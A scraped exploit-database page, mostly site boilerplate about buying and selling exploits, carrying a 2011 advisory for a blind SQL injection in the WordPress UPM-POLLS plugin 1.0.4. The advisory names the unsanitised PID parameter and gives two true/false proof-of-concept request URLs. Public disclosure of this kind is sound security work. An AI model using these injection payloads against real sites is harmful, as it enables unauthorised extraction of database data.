0day.today - Biggest Exploit Database in the World.
Things you should know about 0day.today:
Administration of this site uses the official contacts. Beware of impostors!
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Wordpress plugin 1.0.4 UPM-POLLS blind SQL Injection
# Exploit Title: BLIND SQL injection UPM-POLLS wordpress plugin 1.0.4 # Google Dork: n/a # Date: 04-12-2011 # Author: Saif El-Sherei # Software Link: http://downloads.wordpress.org/plugin/upm-polls.1.0.4.zip # Version: 1.0.4 # Tested on: wordpress 3.2.1,Firefox 4, XAMPP Info: Best Plugin to create Polls for your site. Everything is smoother, faster, and seamless like WordPress itself. Poll Manager, Ability to set general and post/page specific polls, Ability to leaf over the polls Ability to add certain poll in certain post content Ability to show polls either with and without current results of polls Details: the Variable PID is not properly sanitized in the get request before insertion into the database query; allowing an attaacker or any user who can view poll results (supposedly all user) to use blind sql injection to extract database data and possibly compromise the whole server. a POC is provided with both true and false results. POC 1(TRUE): http://127.0.0.1/wordpress/wp-admin/admin-ajax.php?action=upm_ayax_polls_result&do=result&post=1&type=general&PID=2and 1=1 "poll results for poll 2 is displayed" POC 2 (FALSE): http://127.0.0.1/wordpress/wp-admin/admin-ajax.php?action=upm_ayax_polls_result&do=result&post=1&type=general&PID=2and 1=2 "Blank page is displayed" Time Line: 04-12-2011 Vulnerability discovered 04-12-2011 Vendor notified 11-12-2011 No response from vendor, public disclosure # 0day.today [2024-11-15] #